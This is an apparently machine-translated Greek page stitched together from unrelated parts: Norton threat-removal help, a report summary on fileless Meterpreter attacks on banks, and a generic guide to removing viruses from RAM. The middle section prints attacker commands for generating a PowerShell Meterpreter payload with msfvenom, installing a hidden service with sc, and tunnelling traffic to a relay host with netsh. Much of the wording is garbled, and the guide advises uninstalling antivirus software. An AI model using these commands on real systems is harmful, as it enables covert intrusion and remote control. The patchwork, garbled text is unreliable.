Δείτε και επιδιορθώστε τις απειλές ασφαλείας της συσκευής που εντοπίστηκαν από το Norton. Το "αόρατο" κακόβουλο λογισμικό δεν αφήνει αρχεία, κρύβεται στη μνήμη και επιτίθεται σε μεγάλες εταιρείες Διόρθωση απειλών που δεν εξαλείφθηκαν κατά τη σάρωση

σχετικά με μια συναρπαστική νέα καμπάνια κακόβουλου λογισμικού που έχει επηρεάσει τράπεζες, τηλεπικοινωνίες, κρατικούς φορείς και άλλες εταιρείες και οργανισμούς σε περισσότερες από σαράντα χώρες σε όλο τον κόσμο.

Αναλυτές της ομάδας GreAT γράφουν ότι οι ειδικοί της ομάδας τραπεζικής ασφάλειας ήταν οι πρώτοι που παρατήρησαν την απειλή: στη συνέχεια φυσική μνήμηο ελεγκτής τομέα βρήκε τον κωδικό Meterpreter. Τα προϊόντα της Kaspersky Lab αναγνωρίζουν προβλήματα όπως το MEM: Trojan.Win32.Cometer και το MEM: Trojan.Win32.Metasploit. Όταν οι αναλυτές άρχισαν να καταλαβαίνουν, προσπαθώντας να καταλάβουν από πού προέρχεται ο κώδικας στη μνήμη, βρήκαν επίσης σενάρια PowerShell στο μητρώο των windows, και το βοηθητικό πρόγραμμα NETSH, το οποίο χρησιμοποιήθηκε για τη διοχέτευση της κυκλοφορίας στον διακομιστή εντολών και ελέγχου των εισβολέων.

Αυτές οι επιθέσεις ονομάζονται επιθέσεις "χωρίς αρχείο", που σημαίνει ότι το κακόβουλο λογισμικό δεν τοποθετεί αρχεία στον σκληρό δίσκο, αντίθετα, το ωφέλιμο φορτίο εγχέεται απευθείας στη μνήμη και υπάρχει μέσα στη μνήμη RAM. Είναι, φυσικά, εξαιρετικά δύσκολο να εντοπιστεί και να παρακολουθηθεί μια τέτοια επίθεση.

Σχέδιο επίθεσης

Οι ερευνητές εξηγούν ότι το γνωστό πλαίσιο Metasploit μπορεί να χρησιμοποιηθεί για τη δημιουργία σεναρίων, όπως στο παρακάτω παράδειγμα.

Σενάρια όπως αυτό βοηθούν στην έγχυση του Meterpreter στη μνήμη RAM. Το Msfvenom από το Metasploit μπορεί να χρησιμοποιηθεί για τη δημιουργία τους:

Msfvenom -p windows / meterpreter / bind_hidden_tcp AHOST = 10.10.1.11 -f psh-cmd

Όταν δημιουργείται το σενάριο, οι εισβολείς χρησιμοποιούν το Windows SC για να εγκαταστήσουν την κακόβουλη υπηρεσία στον κεντρικό υπολογιστή προορισμού (ο οποίος τελικά θα εκτελέσει το παραπάνω σενάριο). Αυτό μπορεί να γίνει, για παράδειγμα, χρησιμοποιώντας την ακόλουθη εντολή:

sc \\ target_name create ATITscUA binpath = “C: \ Windows \ system32 \ cmd.exe / b / c start / b / min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start = manual

Το επόμενο βήμα είναι να διαμορφώσετε τη σήραγγα έτσι ώστε το μολυσμένο μηχάνημα να είναι προσβάσιμο στον απομακρυσμένο κεντρικό υπολογιστή. Για να γίνει αυτό, οι εισβολείς χρησιμοποιούν την ακόλουθη εντολή:

netsh interface portproxy add v4tov4 listenport = 4444 connectaddress = 10.10.1.12 connectport = 8080 listenaddress = 0.0.0.0

Ως αποτέλεσμα, όλη η κίνηση δικτύου από την 10.10.1.11:4444 θα ανακατευθυνθεί στην 10.10.1.12:8080. Αυτή η τεχνική σάς επιτρέπει να δημιουργήσετε μια σήραγγα μεσολάβησης μέσω της οποίας οι εγκληματίες μπορούν να ελέγχουν εξ αποστάσεως έναν κεντρικό υπολογιστή που έχει μολυνθεί από το PowerShell.

Οι αναλυτές επισημαίνουν ότι η χρήση SC και NETSH απαιτεί δικαιώματα διαχειριστή σε τοπικούς και απομακρυσμένους κεντρικούς υπολογιστές. Η χρήση κακόβουλων σεναρίων PowerShell απαιτεί επίσης κλιμάκωση των δικαιωμάτων και αλλαγές στην πολιτική εκτέλεσης. Για να γίνει αυτό, οι εισβολείς χρησιμοποιούν το ανατρεπόμενο διαπιστευτήριο Mimikatz, συλλέγοντας κωδικούς πρόσβασης από λογαριασμούς στον τοπικό υπολογιστή και στους γύρω σταθμούς εργασίας.

Έχοντας μελετήσει προσεκτικά την επίθεση σε μία από τις πληγείσες τράπεζες, οι ερευνητές κατέληξαν στο συμπέρασμα ότι οι χειριστές αυτής της καμπάνιας χρησιμοποιούσαν τομείς τρίτου επιπέδου, καθώς και τομείς στις ζώνες .GA, .ML, .CF. Το γεγονός είναι ότι τέτοιοι τομείς είναι δωρεάν, πράγμα που σημαίνει ότι οι εισβολείς δεν αφήνουν πίσω τους πληροφορίες WHOIS.

Συνοψίζοντας όλα τα παραπάνω (με χρήση Metasploit και standard βοηθητικά προγράμματα των Windowsτομείς χωρίς πληροφορίες WHOIS), οι ερευνητές καταλήγουν στο συμπέρασμα ότι η γραφή άγνωστων εισβολέων μοιάζει πολύ με τη δουλειά ομάδων όπως η GCMAN και η Carbanak. Ωστόσο, δεν υπάρχουν άμεσες αποδείξεις, επομένως δεν είναι δυνατό να συνδεθούν αυτές οι σιωπηλές επιθέσεις με κάποια συγκεκριμένη ομάδα.

«Τεχνικές όπως αυτές που περιγράφονται σε αυτήν την έκθεση γίνονται πιο κοινές, ειδικά [όταν πραγματοποιούνται επιθέσεις] εναντίον μεγάλων στόχων στον τραπεζικό κλάδο. Δυστυχώς, η χρήση απλών εργαλείων, σε συνδυασμό με διάφορα κόλπα, καθιστούν τον εντοπισμό [τέτοιων επιθέσεων] εξαιρετικά δύσκολο», συνοψίζουν οι ειδικοί της GreAT.

Όταν το Norton ανιχνεύσει μια απειλή, το πρόγραμμα την αφαιρεί αυτόματα, εκτός εάν η παρέμβασή σας είναι απαραίτητη για τον προσδιορισμό του τρόπου χειρισμού της απειλής. Σε τέτοιες περιπτώσεις, το Norton εμφανίζει μια ειδοποίηση "Εντοπίστηκαν απειλές" ή "Κίνδυνος ασφαλείας" με διαθέσιμες επιλογές για την απόκριση στην απειλή.

Προβολή απειλών που αποκαταστάθηκαν αυτόματα κατά τη διάρκεια μιας σάρωσης

    Ξεκινήστε το Norton.

    Ασφάλεια συσκευής, κάντε κλικ στο Άνοιγμα.

    Στο παράθυρο Ημερολόγιο ασφαλείας Εξάλειψη των απειλών για την ασφάλεια.

    Επιλέξτε μια απειλή από τη λίστα και ελέγξτε τις ενέργειες που έγιναν στο παράθυρο Λεπτομέρειες.

Σε ορισμένες περιπτώσεις, αντί να αποκαθιστά αυτόματα μια απειλή, το Norton συνιστά να προβείτε σε μια συγκεκριμένη ενέργεια για την αποκατάστασή της.

Διόρθωση απειλών που δεν επιλύθηκαν κατά τη σάρωση

    Ξεκινήστε το Norton.

    Εάν το παράθυρο My Norton εμφανίζεται δίπλα Ασφάλεια συσκευής, κάντε κλικ στο Άνοιγμα.

    Στο κύριο παράθυρο του Norton, κάντε διπλό κλικ στην Ασφάλεια και, στη συνέχεια, επιλέξτε Ιστορικό.

    Στο παράθυρο Ημερολόγιο ασφαλείαςστη λίστα Εμφάνιση, επιλέξτε Ανεπίλυτες απειλές για την ασφάλεια.

    Εάν η λίστα περιέχει απειλές που δεν έχουν επιλυθεί, επιλέξτε την απειλή που σας ενδιαφέρει.

Εάν υπάρχει οποιοσδήποτε λόγος να πιστεύετε ότι το σύστημά σας έχει μολυνθεί, εκτελέστε το Norton Power Eraser. Το Norton Power Eraser είναι ισχυρό εργαλείοαφαίρεση κακόβουλου λογισμικού για να απαλλαγείτε από τις πιο ισχυρές απειλές ασφαλείας. Για περισσότερες πληροφορίες δείτε το έγγραφο Εκτελέστε το Norton Scan for PC Threats

Το Norton Power Eraser είναι ένα επιθετικό εργαλείο αφαίρεσης κακόβουλου λογισμικού. Μερικές φορές μαζί με κακόβουλο λογισμικόΤο Norton Power Eraser μπορεί να αφαιρέσει αξιόπιστα αρχεία, επομένως ελέγξτε τα αποτελέσματα της σάρωσης προσεκτικά πριν διαγράψετε οποιοδήποτε αρχείο.

Από προεπιλογή, το Norton αφαιρεί τις απειλές ασφαλείας από τον υπολογιστή σας και τις θέτει σε καραντίνα. Εάν έχετε λόγους να πιστεύετε ότι ένα αρχείο διαγράφηκε κατά λάθος, μπορείτε να το επαναφέρετε από την καραντίνα στην αρχική του θέση και να το εξαιρέσετε από τις επόμενες σαρώσεις.

Επαναφορά αρχείου από την καραντίνα

    Ξεκινήστε το Norton.

    Εάν το παράθυρο My Norton εμφανίζεται δίπλα Ασφάλεια συσκευής, κάντε κλικ στο Άνοιγμα.

    Στο κύριο παράθυρο του Norton, κάντε κλικ στην Ασφάλεια και, στη συνέχεια, επιλέξτε Ιστορικό.

    Στο παράθυρο Ημερολόγιο ασφαλείαςαναπτύξτε το μενού Εμφάνιση και επιλέξτε την επιλογή Καραντίνα.

    Επιλέξτε το αρχείο που θέλετε να ανακτήσετε.

    Στο παράθυρο Λεπτομέρειες, κάντε κλικ στην επιλογή Επιλογές.

    Στο παράθυρο Εντοπίστηκε απειλήεπιλέξτε ομάδα Ανάκτηση και εξαίρεση αυτού του αρχείου.

    Στο παράθυρο Αποκατάσταση από την καραντίνακάντε κλικ στο κουμπί Ναι.

    Στο παράθυρο Αναζήτηση φακέλου, επιλέξτε έναν φάκελο ή μονάδα δίσκου για να τοποθετήσετε το ανακτημένο αρχείο και κάντε κλικ στο OK.

Ιός σε μνήμη τυχαίας προσπέλασης, το φαινόμενο αυτό είναι αρκετά δυσάρεστο και δυστυχώς όχι σπάνιο. πολύ συχνά βλέπουμε ένα κρυφό αρχείο αλλά δεν μπορούμε να το διαγράψουμε με κανέναν τρόπο - όλα εμφανίζονται και εμφανίζονται ή το ίδιο το χειρουργείο Σύστημα Windowsδεν επιτρέπει να γίνει.

Παρεμπιπτόντως, εκδηλώνεται πολύ πιο συχνά σε περιπτώσεις λάθος ρύθμιση antivirus ή έλλειψη αυτού. Εάν έχετε μια τέτοια κατάσταση, σας συνιστώ να διαβάσετε το άρθρο - εγκατάσταση και ρύθμιση παραμέτρων προστασίας από ιούς στα Windows. Πριν αφαιρέσετε έναν ιό από τη μνήμη RAM, θα πρέπει να καταλάβετε τι συμβαίνει με το πρόγραμμα προστασίας από ιούς που είναι εγκατεστημένο στον υπολογιστή σας. Πιθανότατα, το πρόγραμμα προστασίας από ιούς "καταστράφηκε" από τον ιό που εμφανίστηκε. Είναι πιθανό να μην υπάρχει μέθοδος στο οπλοστάσιο υπογραφής του προγράμματος προστασίας από ιούς για πλήρη διαγραφή του ιού από την έγκαιρη συλλογή και το πρόγραμμα προσπαθεί μόνο να τον αφαιρέσει ιογενής λοίμωξη, όχι ο ίδιος ο ιός.

Συμβαίνει συχνά ένας ιός να μεταφέρει προγράμματα και πρόσθετα αρχεία για τη δική του εργασία ή να ξεκινά αυτόματα να λειτουργεί και τώρα το πρόγραμμα προστασίας από ιούς θα εντοπίσει αυτά τα αντίγραφα, αλλά δεν θα εντοπίσει την ίδια την πηγή (ιό) και στις περισσότερες περιπτώσεις δεν μπορεί να αντιμετωπίσει το.

  1. Αφαιρούμε (χρησιμοποιώντας το πρόγραμμα απεγκατάστασης - προσθέτουμε / αφαιρούμε προγράμματα) το εγκατεστημένο πρόγραμμα προστασίας από ιούς, είναι άχρηστο εδώ.
  2. Κατεβάστε το Ccleaner από το Internet και εγκαταστήστε το. Ξεκινώντας, πρώτα καθαρίζουμε τους φακέλους temp. Αυτό το λογισμικό είναι κατάλληλο απλούς χρήστες, με βάση αυτό, είναι δυνατό να τοποθετήσετε όλα τα πλαίσια ελέγχου ρυθμίσεις - χρήστηδεν θα σβήσει τα δεδομένα! Έγραψα περισσότερα για το πρόγραμμα στο άρθρο - καθαρισμός του μητρώου.
  3. Τότε το βοηθητικό πρόγραμμα καθαρισμού ιών θα είναι χρήσιμο για να μας βοηθήσει. Έγραψα γι 'αυτούς στο άρθρο - δωρεάν βοηθητικά προγράμματα για την αφαίρεση ιών. Επιλέγουμε οποιοδήποτε. Για παράδειγμα, κατεβάστε το πρόγραμμα Dr.web Cure it από το Διαδίκτυο και εγκαταστήστε το.
  4. Εγκαθιστούμε την ενημέρωση, εκκινούμε μία από τις δύο σαρώσεις (γρήγορη ή πλήρη). Η ταχεία σάρωση δίνει, καταρχήν, ένα αποτελεσματικό αποτέλεσμα. Διαγράφουμε όλους τους ιούς που έχουν εντοπιστεί. Κάνουμε επανεκκίνηση του υπολογιστή.
  5. Λήψη νέου antivirus. Είναι θεμελιωδώς σημαντικό! Σε περίπτωση που αντιμετωπίσατε προβλήματα, είχατε εγκαταστήσει το antivirus Eset NOD32 antivirus, εγκαταστήστε το Avast ή το Avira, εάν ήταν εγκατεστημένο το Avast, εγκαταστήστε το Eset ή οποιοδήποτε άλλο πρόγραμμα προστασίας από ιούς της επιλογής σας.
  6. Είναι πολύ εύκολο να ερμηνεύσετε τέτοιες ενέργειες, το πρόγραμμα προστασίας από ιούς που είχατε πιθανότατα ήταν κατεστραμμένο, τα δεδομένα στο μητρώο είχαν την ευκαιρία να παραμείνουν και αυτό θα οδηγήσει σε ανακριβή λειτουργία του προγράμματος προστασίας από ιούς, ειδικά επειδή αυτό το συγκεκριμένο πρόγραμμα προστασίας από ιούς έκανε δεν βρείτε απειλή από το Διαδίκτυο στον υπολογιστή σας.